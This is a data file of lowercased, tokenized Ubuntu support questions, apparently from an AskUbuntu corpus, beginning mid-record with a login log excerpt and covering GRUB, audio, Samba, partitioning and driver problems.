/lib/security/pam_kwallet.so : can not open shared object file : no such file or directory may 27 18:43:54 ted lightdm : pam adding faulty module : pam_kwallet.so may 27 18:43:54 ted lightdm : pam_unix ( lightdm-greeter : session ) : session opened for user lightdm by ( uid=0 ) may 27 18:43:54 ted systemd-logind [ 739 ] : new session c1 of user lightdm . may 27 18:43:54 ted systemd-logind [ 739 ] : linked /tmp/.x11-unix/x0 to /run/user/112/x11-display . may 27 18:43:57 ted lightdm : pam unable to dlopen ( pam_kwallet.so ) : /lib/security/pam_kwallet.so : can not open shared object file : no such file or directory may 27 18:43:57 ted lightdm : pam adding faulty module : pam_kwallet.so may 27 18:43:57 ted lightdm : pam_succeed_if ( lightdm : auth ) : requirement `` user ingroup nopasswdlogin '' not met by user `` dee '' may 27 18:43:58 ted dbus [ 674 ] : [ system ] rejected send message , 7 matched rules ; type= '' method_return '' , sender= '' :1.18 '' ( uid=0 pid=1210 comm= '' /usr/sbin/dnsmasq -- no-resolv -- keep-in-foreground '' ) interface= '' ( unset ) '' member= '' ( unset ) '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' :1.5 '' ( uid=0 pid=820 comm= '' networkmanager `` ) may 27 18:44:02 ted lightdm : pam_unix ( lightdm-greeter : session ) : session closed for user lightdm may 27 18:44:02 ted lightdm : pam_unix ( lightdm : session ) : session opened for user dee by ( uid=0 ) may 27 18:44:02 ted systemd-logind [ 739 ] : new session c2 of user dee . may 27 18:44:02 ted systemd-logind [ 739 ] : linked /tmp/.x11-unix/x0 to /run/user/1000/x11-display . may 27 18:44:06 ted polkitd ( authority=local ) : registered authentication agent for unix-session : c2 ( system bus name :1.68 [ /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1 ] , object path /org/gnome/policykit1/authenticationagent , locale en_gb.utf-8 )
472617	cpu temperature is high on ubuntu	so i have a machine which has both latest *ubuntu and windows 8 on it . on windows 8 my cpu temp is roughtly 26 degrees when idle . now when i boot into ubuntu , cpu temperature is suddenly 43 degrees when idle , plus my fans are making a lot of noise which is probably because of the cpu degrees . why is that ? everywhere i read it says the linux is much better at managing cpu and so on . but yet it seems something is wrong . it is a stock installation of ubuntu 14.04 and my cpu is a intel i5-4570
472618	how do i install ubuntu on my hp mini 210-1010	i have no external drive , but i do have a usb . i have tried all versions of ubuntu , yet i still keep getting the blank screen with a blinking cursor in the top left corner . i use unetbootin on my usb drive and i have followed all the steps and every time i boot from the usb , it comes up on the same screen . help !
472619	how do i replace ubuntu on a windows 8 uefi laptop ?	i understand this is an ubuntu forum so it might be a little weird to ask how to install over ubuntu , but i thought this might be a good place to ask . i 'm currently dual booting ubuntu and windows 8 on a uefi laptop , but i 'd like to try a new linux distro ( wo n't specify which to avoid being yelled at over my choice or something ) and i need my windows 8 installation and i do n't have a ton of disk space so i 've decided to just write over my ubuntu installation . however , i 'm not sure how easy it is to do since it 's a uefi device . how would i go about doing this ? would it be the same as installing over ubuntu on any other dual boot machine ?
472627	no speaker sound on hp probook 6550b	i have this problems since always , but never care , today i want to use only ubuntu , no more windows , so i installed ubuntu 14.04 and the speakers does not work ( work fine on windows until yesterday ) but the headphones jack works properly i try to check alsamixer , and everything is in 100 , but if i check the sound devices only show me the headphones i do this link and does not work too , and i do n't know what else i do
472629	how can i avoid audio stutter in mpeg video 's ?	i have a couple of mpeg video files which were digitized from old betamax and vhs tapes , using cyberlink power director on windows xp . these videos play fine in windows , on my old pc , and on my new i7 , but not in xubuntu or mint , where the sound stutters in totem and vlc . these are standard resolution files , no hd or anything , and 720 line hd mp4 's play fine on the same hardware .
472630	kubuntu ibus 14.04 gb ( uk ) english default keyboard missing	i have recently upgraded my machines to kubuntu 14.04 , and it seems that ibus is ( partially ) broken for selecting the gb ( uk ) default keyboard . the closest keyboard that i have to choose from is english - english ( uk , extended winkeys ) which means that the back-tick or open single quote key on the left needs to be pressed twice in order to the the character . right click ( leftmost ) icon keyboard with world picture on it : brings up this menu : but if i go into : system settings hardware input devices keyboard layouts check configure layouts add , i can configure a gb default layout . this article suggest to remove ibus : xubuntu 14.04 keyboard layout uk gb is this solution okay for kde / kubuntu ?
472632	libreoffice crash problem	so i have libreoffice 4.2.3.3 on my ubuntu 14.04 and when i have both writer and calc open and i want to drag and drop or just copy and paste a part of my table in the calc into my writer , they both will just crash . what can i do to fix this ? i am unable to continue my work because i can not put the tables from calc into my writer .
472634	how to specify root for installing ubuntu	i 'm trying to install ubuntu . my system have pre-installed windows 8 . i made usb bootable and then i booted into ubuntu from there and i am in try ubuntu mode now , i am having a problem in installing ubuntu . when i attempt install ubuntu then it says : no root file system is defined . correct this from the partitioning menu .
472635	3d graphics / hd video	are there advantages of 3d graphics and hd video if i am not using my computer for those purposes ? my work is mostly text based ( and audio ) . the 3d environment of ubuntu desktop is uncomfortable for my eyes but it seems to be an integral component of ubuntu/unity .
472636	script to automatically create ext4 and swap in unallocated diskspace	i have to setup/install a number of machines . some machines have windows 7 installed . some machines not . the machines have either 0 , 2 , or 3 partitions . every machine has enough free diskspace ( 20 to 250 gb ) . i installed an `` golden client '' and built a .tar archive of this client . now , every client boots up a small linux via pxe , and runs a script . this script should create an ext4 and a swap partition using the whole free space . after this , mount the ext4-partition , copy tar , chroot , and so on . i can create partitions using fdisk . but how can i figure out the partition number of the new partition . for example , do i have to mount /dev/sda3 or /dev/sda1 ? furthermore , how can i figure out if the partition is unallocated space , and how much space there is ?
472637	how to set the default audio recorder application ?	i installed the tool audio-recorder doing this : sudo add-apt-repository ppa : osmoma/audio-recorder sudo apt-get update sudo apt-get install audio-recorder now how can you set it up as default audio recorder for ubuntu ?
472645	eclipse-cdt problems	i have got a weird problem . i installed eclipse for c/c++ development using the following : sudo apt-get install eclipse eclipse-cdt g++ after i opened eclipse , i tried to make a new project , but i did n't get an option to choose between types of projects ( c project/ c++ project/ java project ) but just the option `` project '' . this project did not generate a src folder . i did n't see an option to create a src folder as well . how do i fix that ? i tried installing it manually with the download from their site , but the program did n't even launch .
472646	juju ceilometer-agent is not reporting about nova-compute	i have deployed both ceilometer and ceilometer-agent and added relationship between them . after deployment i can see the resource usage for network ( neutron ) , glance , cinder but i can not see the information for nova-compute . but it is instructed that ceilometer-agent should deployed in every compute node but with juju its not possible to deploy it on specific compute node . thanks in advance for your help .
472650	grub2 issues after upgrade	i just upgraded a cloud server to 14.04 and grub2 going to a grub rescue prompt on boot . i have attempted to follow the instructions here : https : //help.ubuntu.com/community/grub2/troubleshooting but the system will not boot . i can do a ls / and it displays the /boot directory . the root partition appears to be set to the correct drive . when i do a insmod normal it gives me error : file not found i am not even seeing a linux.mod or normal.mod files in my grub directory . i am thinking that the grub install may have failed . what steps would be recommended to rescue this server ? again this is on a vmware esx system so booting from a cd is going to be quite complicated . what files should i have in the grub and boot folder ? what insmod command should i be running to set the kernel and boot commands ?
472651	i found the chromoting viewer in my chromium addons is that supposed to be there on a default install ?	so i found chromoting viewer in my add-ons for chromium . is that supposed to be there ? i just installed chromium and only installed the pepper flash player . i disabled chromium and got an error is crashed but it did n't and then a popup that said the default file was modified asking me if i want to include it in the error report . the default file : default settings for chromium-browser . this file is sourced by /bin/sh from /usr/bin/chromium-browser options to pass to chromium-browser chromium_flags= '' '' part for pepperflashplugin-nonfree : begin flashso= '' /usr/lib/pepperflashplugin-nonfree/libpepflashplayer.so '' if [ -f $ flashso ] then flashversion=`strings $ flashso|grep ^lnx|sed -e `` s/^lnx // '' |sed -e `` s/ , /./g '' ` chromium_flags= '' $ chromium_flags -- ppapi-flash-path= $ flashso -- ppapi-flash- > version= $ flashversion '' fi > part for pepperflashplugin-nonfree : end
472652	hp device manager still in menu after hplip uninstall	i have uninstalled hplip according to the directions on http : //hplipopensource.com/node/188 from xubuntu 14.04 , meaning that i typed this into my terminal emulator : sudo rm -rf /usr/share/hplip sudo rm -rf /etc/hp sudo rm -rf ~/.hplip sudo rm -rf /var/lib/hp those commands removed everything , but a shortcut to hp device manager is still in my menu . of course , when i click it it says it ca n't find the executable but that 's normal because it 's a shortcut . so , is this a bug or did i do something wrong and how do i fix it ?
472654	recover deleted encrypted home dir after ubuntu install over partition	i had an encrypted home dir in my ubuntu partition ( system and home together ) . i left the live usb plugged in and someone reinstalled ubuntu over that partition . i read all i could on the net about people with similar issues . first of all , i stopped using the affected hard drive ( writing this from a lubuntu live cd ) . then i ran photorec on the affected disk , without any filter ( i.e . recover everything ) . the results are now sitting in an external disk . among all the files , i think it 's the .ecryptfs ones i need . however , i only know my login password . i never wrote down the mount passphrase . i know i can recover it with just my login password if i find the wrapped-passphrase file . however , photorec did n't recover the original name of any file ( i believe it names them according to the disk sector from which they were recovered ) . moreover , all files are distributed among different directories ( recup_dir.1 and so on ) . is my only choice to wade through the millions of txt files until i find wrapped-passphrase ? i do n't think i could recognize it , since most surely it 's a byte stream and there might be millions of files like that ... edit : just in case anyone was wondering , the version was 12.04 ( which means the filenames were encrypted , iirc ) edit2 : i created an ubuntu 12.04 virtual machine with the same user and password as my old system and enabled home dir encryption . here 's the resulting wrapped-passphrase file :
472656	how do i access shared files on a samba domain controller from win 7 ?	i set up a ubuntu 14.04 server as a domain controller . a windows 7 client can join the domain , show the samba shared directories in the network but can not open any of them except the user 's home directory . the message says i do not have permission to access the directory . i have searched `` askubuntu '' and searched the web via google and have not found a solution . my smb.conf file is : global parameters [ global ] netbios name = frank-n-stein workgroup = tux-net passdb backend = tbdsam os level = 33 wins support = yes preferred master = yes local master = yes domain master = yes security = domain domain logons = yes logon path = \ % n\profiles\ % u ********************************************* passwd chat = *new*password* % n\n *re-enter*new*password* % n\n *password*changed* username map = /etc/samba/smbusers syslog = 0 name resolve order = wins bcast hosts printcap name = cups show add printer wizard = no add user script = /usr/sbin/useradd -m % u delete user script = /usr/sbin/userdel -r % u add group script = /usr/sbin/groupadd % g delete group script = /usr/sbin/groupdel % g add user to group script = /usr/sbin/usermod -g % g % u add machine script = /usr/sbin/useradd -s /bin/false -d /dev/null % u logon script = scripts\logon.bat logon path = logon drive = h : printing = cups *************************************************** [ homes ] comment = home directories valid users = % s read only = no browseable = no [ netlogon ] comment = network logon service path = /var/lib/samba/netlogon guest ok = yes [ accounts ] comment = accounting files path = /media/ken/linux-data/data/accounts writable = yes read only = no guest ok = yes valid users = @ ntadmin browseable = yes create mode = 0660 directory mode = 0770 public = yes [ finsvcs ] comment = financial services files path = /media/ken/linux-data/data/finsvcs writeable = yes read only = no guest ok = yes valid users = @ ntadmin browseable = yes create mode = 0660 directory mode = 0770 public = yes [ printers ] comment = smb print spool path = /var/spool/samba guest ok = yes printable = yes use client driver = yes default devmode = yes browseable = no i am trying to duplicate the configuration in the `` samba 3 by example '' book for the small office in chapter 3 . for the `` valid users '' line in the shares section , i have tried all combinations of group names ( @ { group name } and individual users . i have also tried many variations of `` chown '' and `` chmod '' to change permissions of the share directories . here are permissions for the parent directory of the shared files : drwsrwsr-x 6 ken ntadmin 4096 may 16 11:45 data here are permissions for the two share directories : drwxrwsr-x 2 ken accounts 4096 may 16 11:38 accounts drwxrwsr-x 2 ken finsrvcs 4096 may 16 11:39 finsvcs i just noticed the different spelling of the group and directory in th second line . i will track down and correct that error . i hope someone has an answer . i have spent hours trying to access the folders from win 7 . thanks , in advance .
472659	desktop does n't appear after login	i updated my packages recently ( i suppose to a newer kernel ; i do n't really know ) . once i restarted , my desktop would n't display after i typed in my password . i did what others said and installed compizconfig-settings-manager and enabled but that did n't solve the problem . i also tried dconf reset -f /org/compiz/ but it tells me error : can not autolaunch d-bus without x11 $ display any ideas ?
472660	missing operating system when computer restarts	when i restart my computer , it says `` missing operating system '' , but when i shut it down and turn it back on again , it works fine . i only receive the message when i press the `` restart '' button . if i shut it down and turn it on manually , the system works as it should . it is not a major problem since i can get it to work , but i would still like to fix this . any ideas ?
472667	keyboard layout changes by itself	when ubuntu is restarted , sometimes the keyboard layout is changed from spanish to english . does anyone know how to solve this problem ? i 've had it since ubuntu 13.10 .
472669	install grub on a different partition on triple boot system	i have two ssds.the first one has ubuntu 14.04 lts and windows 8.1 pro.the second one has kali linux installed.since i installed kali linux after ubuntu and windows 8.1 pro it 's bootloader now is in use.the problem is when i remove the second ssd i am not able to boot on the operating systems of the first ssd , because grub ca n't find the second ssd and grub-rescue launches instead.is it possible somehow to make this triple boot system able to work even when the second ssd is missing ? i tried grub-install /dev/sda1 ( sda1 is the partition in which ubuntu is installed ) but i get an error which says : attempting to install grub to a partitionless disk or to a partition . this is a bad idea . i tried also grub-install /dev/sda which did n't gave any errors or warnings but when i tested it by removing the second ssd grub-rescue launched again for the same aforementioned reason . i tried grub-install -- force /dev/sda , grub-install -- force /dev/sda1 , grub-setup /dev/sda , grub-setup /dev/sda1 , grub-setup -- force /dev/sda1 , grub-setup -- force /dev/sda but with no luck .
472671	audio stopped working after running 'sudo startx '	in kubuntu 14.04 my /tmp partition filled up and my display went blank . i logged in over ssh and ran sudo startx and i got a kde session . in retrospect , perhaps that was n't the wisest decision , but here i am . since then , i 've had no audio . i 've tried : rebooting ( cold restart ) removing all kde related ( dot ) directories checking all my dot directories for files owned by root removing ~/.xauthority ( which was owned by root ) removing all kde stuff from /tmp and /var/tmp creating a new user starting a session using xfce making sure the mixer did n't have the volume set to 0 none of which has solved the problem . i 've looked at some audio troubleshooting guides but did n't get too far : aplay -l shows the following : **** list of playback hardware devices **** card 0 : pch [ hda intel pch ] , device 0 : alc898 analog [ alc898 analog ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 3 : hdmi 0 [ hdmi 0 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 7 : hdmi 1 [ hdmi 1 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 card 1 : nvidia [ hda nvidia ] , device 8 : hdmi 2 [ hdmi 2 ] subdevices : 1/1 subdevice # 0 : subdevice # 0 if i then try speaker-test -c2 -t wav ( with and without sudo ) , i get : speaker-test 1.0.27.2 playback device is default stream parameters are 48000hz , s16_le , 2 channels wav file ( s ) rate set to 48000hz ( requested 48000hz ) buffer size range from 96 to 1048576 period size range from 32 to 349526 using max buffer size 1048576 periods = 4 was set period_size = 262144 was set buffer_size = 1048576 0 - front left 1 - front right time per period = 3.029561 0 - front left 1 - front right etc. , until i kill it . no sound is produced . i 've also tried aplay -l and speaker-test -d < device > [ ... ] for a few devices but i have n't included the output here as this question is already way too long . any help is most appreciated . edit : pasting output from amixer scontents as requested by cl . i do n't know why most of the outputa are [ off ] ... simple mixer control 'master',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 87 mono : playback 77 [ 89 % ] [ -7.50db ] [ off ] simple mixer control 'headphone',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ off ] front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'pcm',0 capabilities : pvolume playback channels : front left - front right limits : playback 0 - 255 mono : front left : playback 255 [ 100 % ] [ 0.00db ] front right : playback 255 [ 100 % ] [ 0.00db ] simple mixer control 'front',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ off ] front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'front mic',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 30 [ 97 % ] [ 10.50db ] [ off ] front right : playback 30 [ 97 % ] [ 10.50db ] [ off ] simple mixer control 'front mic boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 2 [ 67 % ] [ 20.00db ] front right : 2 [ 67 % ] [ 20.00db ] simple mixer control 'surround',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ off ] front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'center',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 87 mono : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'lfe',0 capabilities : pvolume pvolume-joined pswitch pswitch-joined playback channels : mono limits : playback 0 - 87 mono : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'side',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 87 mono : front left : playback 87 [ 100 % ] [ 0.00db ] [ off ] front right : playback 87 [ 100 % ] [ 0.00db ] [ off ] simple mixer control 'line',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'line boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ] simple mixer control 'capture',0 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 63 front left : capture 38 [ 60 % ] [ 11.25db ] [ on ] front right : capture 38 [ 60 % ] [ 11.25db ] [ on ] simple mixer control 'capture',1 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 63 front left : capture 0 [ 0 % ] [ -17.25db ] [ off ] front right : capture 0 [ 0 % ] [ -17.25db ] [ off ] simple mixer control 'capture',2 capabilities : cvolume cswitch capture channels : front left - front right limits : capture 0 - 63 front left : capture 0 [ 0 % ] [ -17.25db ] [ off ] front right : capture 0 [ 0 % ] [ -17.25db ] [ off ] simple mixer control 'auto-mute mode',0 capabilities : enum items : 'disabled ' 'enabled' item0 : 'enabled' simple mixer control 'digital',0 capabilities : cvolume capture channels : front left - front right limits : capture 0 - 120 front left : capture 60 [ 50 % ] [ 0.00db ] front right : capture 60 [ 50 % ] [ 0.00db ] simple mixer control 'input source',0 capabilities : cenum items : 'front mic ' 'rear mic ' 'line' item0 : 'line' simple mixer control 'input source',1 capabilities : cenum items : 'front mic ' 'rear mic ' 'line' item0 : 'front mic' simple mixer control 'input source',2 capabilities : cenum items : 'front mic ' 'rear mic ' 'line' item0 : 'front mic' simple mixer control 'rear mic',0 capabilities : pvolume pswitch playback channels : front left - front right limits : playback 0 - 31 mono : front left : playback 0 [ 0 % ] [ -34.50db ] [ off ] front right : playback 0 [ 0 % ] [ -34.50db ] [ off ] simple mixer control 'rear mic boost',0 capabilities : volume playback channels : front left - front right capture channels : front left - front right limits : 0 - 3 front left : 0 [ 0 % ] [ 0.00db ] front right : 0 [ 0 % ] [ 0.00db ]
472672	pulseaudio not working	pulaseaudio seems to be working , but no sound . after totally deleting audio and spending a week trying to fix it , i have concluded that i am lost . ubuntu version 12.04 aplay -l ** list of playback hardware devices ** card 0 : mid [ hda intel mid ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the last part of ( pkill pulseaudio ; sleep 2 ; pulseaudio -vv ) seems to have the word suspended in it a lot ? i : [ alsa-sink ] alsa-sink.c : device suspended ... i : [ pulseaudio ] core.c : all sinks and sources are suspended , vacuuming memory d : [ pulseaudio ] module-udev-detect.c : /dev/snd/controlc0 is accessible : yes removed all audio , oops bad idea , been a week now and need help , thanks
472673	ubuntu on laptop	a friend of mine asked me for a favour ; she uses windows 7 on her laptop with these system specs : video : intel hd graphics family procesor : intel pentium b950 cpu @ 2.10 ghz ram : 4 gb hard disc : 500 gb she complains about how her laptop is overheating and running slow . so i was wondering if installing ubuntu 14.04 lts would solve the problem , at least reduce the overheating and boost the performance ? she asked me if i could install linux on her laptop , as i suggested that linux should run better than windows . so , would ubuntu 14.04 be a good choice or should i go with some more lightweight linux , given the fact that system components are not quite well ?
472674	how to get access to search results tab in privacy settings ?	my problem : i wanted to disable the unity shopping lens on dash . the solution proposed here by salem seemed simple . ubuntu with spyware ? however , my privacy settings does not have the `` search results '' tab on it . i installed ubuntu 12.04 lts . my question : how can i get the search options tab to show up under privacy settings so that way i may be able to disable the unity shopping lens ?
472676	suppress all interaction while installing apt-fast	i want to ask whether there is any method to suppress any interaction while installing apt-fast using apt-get . i add the ppa source and then use the next command to install apt-fast : sudo apt-get -y install apt-fast however , while installing , it always asks which one to wrap , apt-get or aptitude , and then the maximum number of connection . since i want to put the installation command in my script , i want to suppress all interaction and just use the default option . as a result , i can run the script totally silence . any idea ?
472678	custom settings of xterm	is there any way to keep the settings of xterm i 've applied so that it opens with these settings when i reopen it ( stuff like text size , set by ctrl+rightclick ) ?
472681	in consistent ram reports	'' system monitor '' tells me i am using 1.3gb of 2.9gb at 42.8 % `` atop '' tells me i am have 174.8m free `` top '' tells me i have 3072772 total , 2894424 used , 178348 free 3072772kb = 2.93042373657227gb `` top '' total 3040870.4kb = 2.9gb `` system monitor '' total **2894424**kb = 2.76033782958984gb `` top '' used **1363148.8**kb = 1.3bg `` system monitor '' used 174.8m = 0.170703125gb `` atop '' free 0178348kb = 0.170085906982422gb `` top '' free 1531275.2 kb or 1.46gb diffrence between top used and system monitor used that is a lot of ram not accounted for if i only have 0.17gb of ram free is there a problem with one of the programs i should know about ? is the `` root '' user using 1.5 gb of ram ?
472684	ubuntu server configuration -- harddrive partitioning	currently ubuntu server is telling me that when i 'm making a new partition for ubuntu server on this ntfs 1tb hd that i currently have installed to the hardware , that the partition must be a minimum of 52 % of the hard drive space or ~521gb . i 'm almost positive that this will run into other data , as i have quite a bit of stuff on the hard drive currently . can i not make a ubuntu server partition on that hard drive at like 100gb or something ? why does it require so much ?
472688	updating a package using a .deb ?	iâ´m using ubuntu 12.04 lts ( precise/amd64 ) , i have installed virtualbox-4.3 , i was forced to install it with a downloaded package ( .deb ) because i could not download it normally , i used `` free download manager '' to download it because the speed was horrible ( 50kb/s and stuck everytime ) , and today i was doing apt-get update/upgrade and have a update for virtualbox . first , i want to know if i download the virtualbox-4.3_4.3.12-93733~ubuntu~precise_amd64.deb and use the dpkg -i it will update the package without overwriting my settings ( or not ) . second , i want to know if is just with me this problem that is so slow the speed ( in all computers in my network ) . i found a similar question here : using dpkg to install upgrade and dist-upgrade packages . i think this will solve my problem , i will test and after i will post if it worked .
472690	is someone aware of any multi threaded unrar program ?	i was searching in the past ( past few weeks ) for a program/software which is multithreaded and it is able to extract rarparts using multi threading . what software 's i 've already tried ? unrar , unrar-nonfree , rar , 7zip it seemed to me that none of them is multi threaded and therefore they are all slow . the solution would be needed in cli format so if not necessary the no gui . is someone aware of something like this ? i asked on other irc 's for suggestions and they told me , that the best is to write one myself . i may be agree with them , but i do n't have these type of knowledge to achieve this task .
472693	install python packages for specific python version	i understand that in ubuntu 14.04 , you have access to both python 2.7.6 and python 3.4.0 . when getting python packages through the command line , how do i make sure that i am installing packages meant for python 2.7.6 and not for python 3.4.0 ?
472694	system monitor borders missing	it seems that some applications the borders are missing , i noticed it on gnome-system-monitor , but thought not much of it as i do n't really use it . but more applications are having this issue too now , such as gnome-clock . any one any ideas what might be causing this ? most things work fine , e.g . unity-control-center . edit : just found out , i can drag and drop it using the invisible areas ( through the alt modifier obviously ) .
472695	how to install canon printer driver 2.80 ?	setup : canon mf4150 printer , ubuntu 14.04 or 12.04 i am new to linux so i spent the past few weeks playing with ubuntu . the most important issue i had was getting the printer to work and share on windows network . i downloaded the driver from canon 's web site and installed the .deb files , but the printer did not work and i literally tried everything until i came across a post so i am sharing what worked for me . on ubuntu 14.04 64 bit system , you must first install the 32 bit drivers first starting with cndrvcups-common_2.80-1_i386.deb which you double click and the software center will launch and install . i got an error message on ubuntu 12.04 , but no error message on 14.04 and either way it 's fine . after that you just install the 64 bit drivers and it should work . i can print , scan ok and also print from windows 7 through samba .
472698	pulseaudio , suspended	pulseaudio not working pulaseaudio seems to be working , but no sound . after totally deleting audio and spending a week trying to fix it , i have concluded that i am lost . ubuntu version 12.04 aplay -l ** list of playback hardware devices ** card 0 : mid [ hda intel mid ] , device 0 : hda generic [ hda generic ] subdevices : 1/1 subdevice # 0 : subdevice # 0 the last part of ( pkill pulseaudio ; sleep 2 ; pulseaudio -vv ) seems to have the word suspended in it a lot ? i : [ alsa-sink ] alsa-sink.c : device suspended ... i : [ pulseaudio ] core.c : all sinks and sources are suspended , vacuuming memory d : [ pulseaudio ] module-udev-detect.c : /dev/snd/controlc0 is accessible : yes removed all audio , oops bad idea , been a week now and need help , is there a terminal input to fix this ? thanks
472701	ubuntu 14.04 : how to install unity2d ?	i love unity , but would like to use unity2d because it does n't run compiz . how do i do this ?
472703	numeric keypad not working after sign in	i ca n't think of what would cause this problem . the num lock light is on and i can sign in with the number pad ( password is both alpha and numeric ) but when i get into ubuntu the number pad stops working with numlock light on or off . what could cause this and how can i solve it ?
472711	how to modify the css of gnome-shell extension	i 'm trying to change up the css of drop-down terminal , the super awesome gnome-shell extension here : https : //extensions.gnome.org/extension/442/drop-down-terminal/ i ca n't see to get the extension to reflect changes in the gtk.css file or stylesheet.css file . i 'm working within .local/share/gnome-shell/extensions/ and i 'm restarting hoping it 'll adopt changes . any ideas ?
472713	data transfer from 12.04 to 14.04 using same hostname ?	i 've been using my 12.04 server for a year and a half . i 'd like to install 14.04 on a new drive and transfer all my data over once that is complete . i have 720gb of files to to deal with . 12.04 was setup using lvm . i 'd like to use the same hostname . i 'd prefer a clean install as opposed to an upgrade . what would be the best way go about this ? is it as simple as booting to the new install and mounting the 12.04 vg ? i suppose i 'd have to manually set up lvm on 14.04 if i want to use the same hostname .
472714	wrong efi system partition guid ?	on a new gpt initialized disk ( second pc disk ) i created a fat32 partition using gparted . i want to use it as an efi system partition so i flagged it as boot . after that i checked the uuid using the gparted “partition information” option and it reported : 09b1-97a5 . as far as i understand it should be c12a7328-f81f-11d2-ba4b-00a0c93ec93b . i also checked my running operative system disk ( ubuntu 14 ) and found that gparted reports eb78-9ad2 for my actual boot partition uuid . what exactly is gparted reporting as uuid on my efi system partition and why it doesn’t match with the expected c12a7328-f81f-11d2-ba4b-00a0c93ec93b id ?
472718	how to install libxpm.so.6 on ubuntu 14.04 ?	i am trying to install oracle dev suite on ubuntu 14.04 , but it is erroring out saying 'cant access the shared object libxpm.so.6 ' . what should i do to resolve this problem ?
472720	i can not install ubuntu 14.04 due to some problem ?	i have installed window 8.1 on my hp laptop.now i want to install ubuntu 14.04 , i try to use wubi but when i use it , after installation on window , when my computer restart i have a message no root file system is defined i have read some thread here and i got some solution . one of them are '' i must format my partition again , using ext4 format and mount on it '' . i did it by using gparted in try ubuntu mode , but i got another message /dev/sda contains gpt signatures , indicating that it has a gpt table . however , it does not have a valid fake msdos partition table , as it should . perhaps it was corrupted -- possibly by a program that does not understand gpt partition table . or perhaps you deleted the gpt table , and are now using msdos partition table . is this a gpt partition table ? ''
472722	windows partition unknown after ubuntu installation attempt at dual boot - how to fix ?	the idea was to install win 7 and ubuntu with dual boot . however , after installation , gparted shows a /dev/sda1 as an 'unknown ' filesystem and its size is 278 gb . all my windows files , data are in this partition . then , there 's /dev/sda2 with 'ext4 ' filesystem ( size-9.54 gb ) - created during ubuntu install . then , there 's /dev/sda3 with 'extended ' filesystem ( size- 10.5 gb ) - created during ubuntu install . then , there 's /dev/sda5 with 'linux swap ' filesystem ( size- 2 gb ) - created during ubuntu install . then , there 's /dev/sda6 with 'ext4 ' filesystem ( size- 8.5 gb ) - created during ubuntu install . my questions are : what exactly does this gparted output above mean ? how to recover my previous windows 7 installation that 's in /dev/sda1 ( ntfs ) . i have some important files i need . also , i had a pgp encryption on the disk before installing ubuntu . now , it just boots straight into ubuntu ... why ? how to uninstall ubuntu ( the try ubuntu and uninstall did not work . the boot-repair did not work ) i have read other topics but noone has provided a proper step by step answer to how to recover my 278gb windows partition . the testdisk step by step procedure did not work . it says the ntfs disk is unrecognized .
472726	problem installing xubuntu 12.04 audio-video codecs	i used crouton to install xubuntu 12.04.4 lts with the xfce environment on my hp chromebook 11 . i 've gotten it all fully installed and everything ; the only thing i 'm doing now is the basic setup things , like adding codecs and other things like libreoffice , vlc , firefox , ubuntu software center , etc . this information i got from 2 sources : http : //www.efytimes.com/e1/fullnews.asp ? edid=137269 http : //www.binarytides.com/better-xubuntu-14-04/ . i 'm currently on the same step at both urls , which is # 6 on link 1 and # 8 on link 2 . per the articles , which both said the same thing , i typed in sudo apt-get install xubuntu-restricted-extras libavcodec-extra and it did n't do anything . it just kept on saying the same thing : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package libavcodec-extra i 've spend the last hour or so scouring the internet for a solution , for a hint even at what is going on . i do n't want to do a clean reinstall , for two reasons : 1 ) it 's takes like 1.5h just to get the croot fully installed , and 2 ) everything but this out of what i 've done so far ( up to # 6 at link 1 & up to # 8 at link 2 ) works except the audio . i 've already installed flash , so youtube works fine . it 's just i ca n't hear any audio . please help ? thanks in advance . i appreciate all the great help i 've been getting from askubuntu lately . you all are great .
